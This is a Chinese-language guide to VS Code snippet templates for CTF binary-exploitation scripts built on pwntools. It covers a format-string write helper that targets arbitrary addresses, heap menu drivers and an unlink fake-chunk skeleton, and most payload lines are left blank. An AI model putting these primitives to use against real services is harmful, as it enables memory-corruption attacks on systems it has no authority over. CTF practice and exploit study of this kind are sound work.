模板说明
代码格式为 code-snippets，可以直接复制代码并命名为 XXX.code-snippets，然后导入到 VSCode。导入方式这里只提供最简单的一种：依次使用“档案”->“喜好设定”->“使用者程式码片段”（此处与语言包有关，这里示例使用的语言包为“中文(繁体)”），然后点击“新增全域程式码片段档案”，记住弹出的对话框的保存目录（Ubuntu 16.04 默认路径为 ~/.config/Code/User/snippets），最后将 XXX.code-snippets 复制到该目录下，重启 VSCode 即可。
一般模板
代码格式：code-snippets，推荐命名：Pwn.code-snippets，触发词：pwn
{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are:
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders.
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    // "scope": "javascript,typescript",
    // "prefix": "log",
    // "body": [
    // "console.log('$1');",
    // "$2"
    // ],
    // "description": "Log output to console"
    // }
    // Snippet key: inherited from the VS Code example above; only "prefix"
    // decides what triggers the expansion.
    "Print to console": {
        // Only offered inside Python files.
        "scope": "python",
        // Typing this word and accepting the completion inserts "body".
        "prefix": "pwn",
        // One array element per generated line.  The "./" paths and the empty
        // string given to recvuntil are slots to fill in per target; the
        // `payload=` line is left incomplete on purpose.
        "body": [
            "from pwn import *",
            "import sys",
            "context.log_level='debug'",
            "# context.arch='amd64'",
            "",
            "# file_name=ELF(\"./\")",
            "# libc=ELF(\"./\")",
            "# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
            "if args['REMOTE']:",
            " sh = remote(sys.argv[1], sys.argv[2])",
            "else:",
            " sh = process(\"./\")",
            "",
            "payload=",
            "",
            "sh.recvuntil(\"\")",
            "sh.sendline(payload)",
            "sh.interactive()",
            // Trailing comma after the last element: VS Code's tolerant JSON
            // parser accepts it, a strict JSON parser would not.
            "print(sh.recv())",
        ],
        "description": "solve pwn problems!"
    }
}
模板效果
# Skeleton expanded by the `pwn` snippet: open a connection, send one payload,
# then hand the session over to the user.
from pwn import *
import sys
# Echo every byte sent and received while the script is being developed.
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
# `args` is pwntools' KEY=VALUE command-line dictionary: with REMOTE=1 the
# target is host/port from argv[1]/argv[2], otherwise the local binary
# (the path "./" is a template slot).
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./")
# Template slot: the bytes to send; as written this line does not parse.
payload=
# Template slot: the prompt to wait for before sending.
sh.recvuntil("")
sh.sendline(payload)
sh.interactive()
# NOTE(review): interactive() normally returns once the connection is gone, so
# this recv() is more likely to raise EOFError than to print anything — confirm.
print(sh.recv())
格式化字符串模板
代码格式：code-snippets，推荐命名：Pwn_fmt.code-snippets，触发词：pwn_fmt
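{
    // Snippet key: inherited from VS Code's "Print to console" example; only
    // "prefix" decides what triggers the expansion.
    "Print to console": {
        // Only offered inside Python files.
        "scope": "python",
        // Typing this word and accepting the completion inserts "body".
        "prefix": "pwn_fmt",
        // One array element per generated line.  Nested blocks carry real
        // 4/8-space indentation so the expanded script parses; "./", the empty
        // recvuntil delimiters and the format_string_position/Address/Value
        // names are slots to fill in per target.
        "body": [
            "from pwn import *",
            "import sys",
            "context.log_level='debug'",
            "# context.arch='amd64'",
            "",
            "# file_name=ELF(\"./\")",
            "# libc=ELF(\"./\")",
            "# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
            "if args['REMOTE']:",
            "    sh = remote(sys.argv[1], sys.argv[2])",
            "else:",
            "    sh = process(\"./\")",
            "",
            // exec_fmt is the callback FmtStr drives while probing for the offset.
            "def exec_fmt(payload):",
            "    # sh = process(\"./\")",
            "    sh.recvuntil(\"\")",
            "    sh.sendline(payload)",
            "    # sh.recvline()",
            // The template read from an undefined name "p"; the tube is "sh".
            "    info = sh.recv()",
            "    sh.close()",
            "    return info",
            "",
            "def fmt(prev , target):",
            "    if prev < target:",
            "        result = target - prev",
            "        return \"%\" + str(result) + \"c\"",
            "    elif prev == target:",
            "        return \"\"",
            "    else:",
            "        result = 0x10000 + target - prev",
            "        return \"%\" + str(result) + \"c\"",
            "",
            "def fmt64(offset , target_addr , target_value , prev = 0):",
            "    payload = \"\"",
            "    for i in range(3):",
            "        payload += p64(target_addr + i * 2)",
            "    payload2 = \"\"",
            "    for i in range(3):",
            "        target = (target_value >> (i * 16)) & 0xffff ",
            // "$" starts a snippet variable, so an unescaped "$hn" expands to
            // the bare text "hn".  "\\$" (a JSON-escaped backslash) keeps it literal.
            "        payload2 += fmt(prev , target) + \"%\" + str(offset + 8 + i) + \"\\$hn\"",
            "        prev = target",
            "    payload = payload2.ljust(0x40 , \"a\") + payload",
            "    return payload",
            "",
            "log.info('Now,test format string position...')",
            "autofmt = FmtStr(exec_fmt)",
            "print(autofmt.offset)",
            "",
            "payload=fmt64(format_string_position , Address , Value )",
            "# payload=fmtstr_payload(format_string_position, {Address: Value})",
            "sh.recvuntil(\"\")",
            "# gdb.attach(sh)",
            "sh.sendline(payload)",
            "sh.interactive()",
            "print(sh.recv())"
        ],
        "description": "Pwn to fmt"
    }
}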
模板效果
from pwn import *
import sys

# Echo every byte sent and received while the script is being developed.
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

# `args` is pwntools' KEY=VALUE command-line dictionary: pass REMOTE=1 to talk
# to host/port taken from argv[1]/argv[2]; otherwise the binary (the "./" path
# is a template slot) is started locally.
sh = remote(sys.argv[1], sys.argv[2]) if args['REMOTE'] else process("./")
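def exec_fmt(payload):
    """Send one format-string probe over the current tube and return the raw reply.

    Handed to pwntools' ``FmtStr`` as its ``execute_fmt`` callback, which
    calls it repeatedly while searching for the format-string offset.

    Args:
        payload: the format string to send (bytes or str).

    Returns:
        Whatever ``recv()`` yields after the payload has been sent.
    """
    # sh = process("./")
    # Template slot: replace "" with the prompt to wait for before sending.
    sh.recvuntil("")
    sh.sendline(payload)
    # sh.recvline()
    # The template read from an undefined name ``p``; the tube is ``sh``.
    info = sh.recv()
    # NOTE(review): this closes the module-level ``sh``, so every later call on
    # it (the next FmtStr probe, the final recvuntil/sendline) hits a closed
    # connection.  If each probe needs a fresh run of the target, re-enable the
    # local ``sh = process("./")`` above so only that process is closed here.
    sh.close()
    return info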
def fmt(prev , target):
    """Return the ``%Nc`` directive that moves the printed count from ``prev`` to ``target``.

    When ``target`` is below ``prev`` the difference is taken modulo 0x10000
    (the counter is treated as 16 bits wide).  Returns ``""`` when the two
    values already agree.
    """
    if prev == target:
        return ""
    width = target - prev
    if width < 0:
        # Wrap around the 16-bit counter instead of emitting a negative width.
        width += 0x10000
    return "%{}c".format(width)
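def fmt64(offset , target_addr , target_value , prev = 0):
    """Build the format-string payload that writes ``target_value`` to ``target_addr`` in three 16-bit pieces.

    Layout: the ``%Nc%M$hn`` directives come first, padded with ``'a'`` up to
    ``PAD`` bytes, followed by the three target addresses.  Because the
    addresses start ``PAD`` bytes into the buffer they are stack arguments
    ``offset + PAD // 8 + i``; the two constants must stay in step, which is
    why the index is derived from ``PAD`` rather than hard-coded.

    Args:
        offset: stack-argument index at which the format string itself starts.
        target_addr: address of the first 2-byte piece; the next two follow at +2 and +4.
        target_value: value whose low 48 bits are written.
        prev: number of characters already printed before the payload.

    Returns:
        The payload as bytes (directives encoded as ASCII, then the packed addresses).

    Raises:
        ValueError: if the directives do not fit in ``PAD`` bytes — ljust would
            not truncate them, the addresses would shift and the ``$`` indices
            would silently point at the wrong arguments.
    """
    PAD = 0x40
    addrs = b""
    for i in range(3):
        addrs += p64(target_addr + i * 2)
    directives = ""
    for i in range(3):
        piece = (target_value >> (i * 16)) & 0xffff
        # The snippet intends "$hn" here; the rendered template had lost the "$".
        directives += fmt(prev , piece) + "%" + str(offset + PAD // 8 + i) + "$hn"
        prev = piece
    if len(directives) > PAD:
        raise ValueError("format directives exceed %d bytes; addresses would shift" % PAD)
    # encode() keeps this a str on Python 2 and turns it into bytes on Python 3,
    # so the concatenation with the packed addresses works on both.
    return directives.ljust(PAD , "a").encode() + addrs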
# Let pwntools locate the stack-argument index of the format string: FmtStr
# drives exec_fmt with probe strings and exposes the result as .offset.
log.info('Now,test format string position...')
autofmt = FmtStr(exec_fmt)
print(autofmt.offset)
# Template slots: format_string_position, Address and Value are not defined
# anywhere in the template and must be filled in (format_string_position is
# normally the autofmt.offset printed above).
payload=fmt64(format_string_position , Address , Value )
# payload=fmtstr_payload(format_string_position, {Address: Value})
# NOTE(review): exec_fmt ends with sh.close(), so as written this
# recvuntil/sendline pair talks to an already-closed connection — check the
# exec_fmt definition before relying on it.
sh.recvuntil("")
# gdb.attach(sh)
sh.sendline(payload)
sh.interactive()
print(sh.recv())
一般堆利用模板
代码格式：code-snippets，推荐命名：Pwn_heap.code-snippets，触发词：pwn_heap
{
    // Snippet key: inherited from VS Code's "Print to console" example; only
    // "prefix" decides what triggers the expansion.
    "Print to console": {
        // Only offered inside Python files.
        "scope": "python",
        // Typing this word and accepting the completion inserts "body".
        "prefix": "pwn_heap",
        // One array element per generated line.  The empty strings passed to
        // recvuntil/sendline are slots for the target's menu prompts and option
        // numbers; "./" is the binary path.
        "body": [
            "from pwn import *",
            "import sys",
            "context.log_level='debug'",
            "# context.arch='amd64'",
            "",
            "# file_name=ELF(\"./\")",
            "# libc=ELF(\"./\")",
            "# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
            "if args['REMOTE']:",
            " sh = remote(sys.argv[1], sys.argv[2])",
            "else:",
            " sh = process(\"./\")",
            // Menu helpers: each waits for a prompt, picks the option, then
            // answers the follow-up prompts with the given arguments.
            "def creat(chunk_size,value):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(chunk_size))",
            " sh.recvuntil('')",
            " sh.sendline(value)",
            "",
            "def delete(index):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            "",
            "def show(index):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            "",
            "def edit(index,value):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            " sh.recvuntil('')",
            " sh.sendline(value)",
            "",
            "sh.interactive()",
            "print(sh.recv())"
        ],
        "description": "Pwn to heap"
    }
}
模板效果
from pwn import *
import sys

# Echo every byte sent and received while the script is being developed.
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")

# `args` is pwntools' KEY=VALUE command-line dictionary: pass REMOTE=1 to talk
# to host/port taken from argv[1]/argv[2]; otherwise the binary (the "./" path
# is a template slot) is started locally.
sh = remote(sys.argv[1], sys.argv[2]) if args['REMOTE'] else process("./")
def creat(chunk_size,value):
    """Drive the target's "create" menu entry: choose the option, then answer the size and content prompts.

    Every ``''`` is a template slot — the first argument of each call is the
    prompt to wait for, the second the line to send.
    """
    sh.sendlineafter('', '')               # menu prompt -> option number
    sh.sendlineafter('', str(chunk_size))  # size prompt
    sh.sendlineafter('', value)            # content prompt
def delete(index):
    """Drive the target's "delete" menu entry for chunk ``index``.

    Every ``''`` is a template slot — prompt to wait for, then line to send.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
def show(index):
    """Drive the target's "show" menu entry for chunk ``index``.

    Every ``''`` is a template slot — prompt to wait for, then line to send.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
def edit(index,value):
    """Drive the target's "edit" menu entry: choose the option, then answer the index and content prompts.

    Every ``''`` is a template slot — prompt to wait for, then line to send.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
    sh.sendlineafter('', value)       # content prompt
# Hand the session to the user once the menu helpers above have been used.
sh.interactive()
# NOTE(review): interactive() normally returns once the connection is gone, so
# this recv() is more likely to raise EOFError than to print anything — confirm.
print(sh.recv())
Unlink 利用模板
代码格式：code-snippets，推荐命名：Pwn_heap_unlink.code-snippets，触发词：pwn_heap_unlink
{
    // Snippet key: inherited from VS Code's "Print to console" example; only
    // "prefix" decides what triggers the expansion.
    "Print to console": {
        // Only offered inside Python files.
        "scope": "python",
        // Typing this word and accepting the completion inserts "body".
        "prefix": "pwn_heap_unlink",
        // One array element per generated line.  The empty strings passed to
        // recvuntil/sendline are slots for the target's menu prompts and option
        // numbers; "./" is the binary path.
        "body": [
            "from pwn import *",
            "import sys",
            "context.log_level='debug'",
            "# context.arch='amd64'",
            "",
            "# file_name=ELF(\"./\")",
            "# libc=ELF(\"./\")",
            "# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
            "if args['REMOTE']:",
            " sh = remote(sys.argv[1], sys.argv[2])",
            "else:",
            " sh = process(\"./\")",
            // Menu helpers: each waits for a prompt, picks the option, then
            // answers the follow-up prompts with the given arguments.
            "def creat(chunk_size,value):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(chunk_size))",
            " sh.recvuntil('')",
            " sh.sendline(value)",
            "",
            "def delete(index):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            "",
            "def show(index):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            "",
            "def edit(index,value):",
            " sh.recvuntil('')",
            " sh.sendline('')",
            " sh.recvuntil('')",
            " sh.sendline(str(index))",
            " sh.recvuntil('')",
            " sh.sendline(value)",
            "",
            // Fake-chunk skeleton: target_addr, the p64() size argument and the
            // padding length are deliberately left blank, so these lines do not
            // parse until filled in.  fake_chunk is assembled but never sent here.
            "target_addr=",
            "fd=target_addr - 0x18",
            "bk=target_addr - 0x10",
            "fake_chunk='a'*0x8 # prev_size",
            "fake_chunk+=p64() # size",
            "fake_chunk+=p64(fd)+p64(bk)",
            "fake_chunk+='a'* #padding",
            "",
            "sh.interactive()",
            "print(sh.recv())"
        ],
        "description": "Pwn to heap unlink"
    }
}
模板效果
from pwn import *
import sys

# Echo every byte sent and received while the script is being developed.
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")

# `args` is pwntools' KEY=VALUE command-line dictionary: pass REMOTE=1 to talk
# to host/port taken from argv[1]/argv[2]; otherwise the binary (the "./" path
# is a template slot) is started locally.
sh = remote(sys.argv[1], sys.argv[2]) if args['REMOTE'] else process("./")
def creat(chunk_size,value):
    """Select the target's "create" option and answer its size and content prompts.

    The ``''`` arguments are template slots: prompt to wait for, then the
    line to send.  ``chunk_size`` is sent as its decimal string.
    """
    sh.sendlineafter('', '')               # menu prompt -> option number
    sh.sendlineafter('', str(chunk_size))  # size prompt
    sh.sendlineafter('', value)            # content prompt
def delete(index):
    """Select the target's "delete" option and answer the index prompt with ``index``.

    The ``''`` arguments are template slots: prompt to wait for, then the line to send.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
def show(index):
    """Select the target's "show" option and answer the index prompt with ``index``.

    The ``''`` arguments are template slots: prompt to wait for, then the line to send.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
def edit(index,value):
    """Select the target's "edit" option and answer its index and content prompts.

    The ``''`` arguments are template slots: prompt to wait for, then the
    line to send.  ``index`` is sent as its decimal string, ``value`` as is.
    """
    sh.sendlineafter('', '')          # menu prompt -> option number
    sh.sendlineafter('', str(index))  # index prompt
    sh.sendlineafter('', value)       # content prompt
# Fake-chunk skeleton.  target_addr, the p64() size argument and the padding
# length are template slots left blank on purpose; as written these lines do
# not parse until they are filled in.
target_addr=
# fd and bk are computed relative to target_addr, so only target_addr needs
# filling in.
fd=target_addr - 0x18
bk=target_addr - 0x10
fake_chunk='a'*0x8 # prev_size
fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
fake_chunk+='a'* # padding
# fake_chunk is assembled above but never sent by the template; the menu
# helpers defined earlier are the intended way to deliver it.
sh.interactive()
# NOTE(review): interactive() normally returns once the connection is gone, so
# this recv() is more likely to raise EOFError than to print anything — confirm.
print(sh.recv())